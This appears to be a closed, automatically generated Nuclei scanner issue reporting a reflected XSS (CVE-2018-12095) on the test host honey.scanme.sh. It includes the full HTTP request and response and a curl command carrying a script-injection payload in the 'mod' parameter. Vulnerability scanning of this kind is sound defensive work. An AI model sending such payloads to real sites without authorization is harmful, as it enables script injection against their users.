Closed mkrs2404 closed 2 months ago
Details: CVE-2018-12095 matched at honey.scanme.sh
Protocol: HTTP
Full URL: https://honey.scanme.sh/cms/info.php?mod=list%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
Timestamp: Tue Apr 30 13:42:07 +0000 UTC 2024
Source: https://cloud.projectdiscovery.io/vuln/528ba8a2d27924535f67d3c2d6320be2
Template Information
Request
GET /cms/info.php?mod=list%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1 Host: honey.scanme.sh User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36 Edg/90.0.818.42 Connection: close Accept: */* Accept-Language: en Accept-Encoding: gzip
Response
HTTP/1.1 200 OK Connection: close Content-Length: 330 Content-Type: text/html Date: Tue, 30 Apr 2024 13:42:07 GMT GET /cms/info.php?mod=list</script><script>alert(document.domain)</script> HTTP/1.1 Host: honey.scanme.sh Accept: */* Accept-Encoding: gzip Accept-Language: en Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36 Edg/90.0.818.42
References:
CURL command
curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36 Edg/90.0.818.42' 'https://honey.scanme.sh/cms/info.php?mod=list%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
Generated by Nuclei v3.2.5
Details: CVE-2018-12095 matched at honey.scanme.sh
Protocol: HTTP
Full URL: https://honey.scanme.sh/cms/info.php?mod=list%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
Timestamp: Tue Apr 30 13:42:07 +0000 UTC 2024
Source: https://cloud.projectdiscovery.io/vuln/528ba8a2d27924535f67d3c2d6320be2
Template Information
Request
Response
References:
CURL command
Generated by Nuclei v3.2.5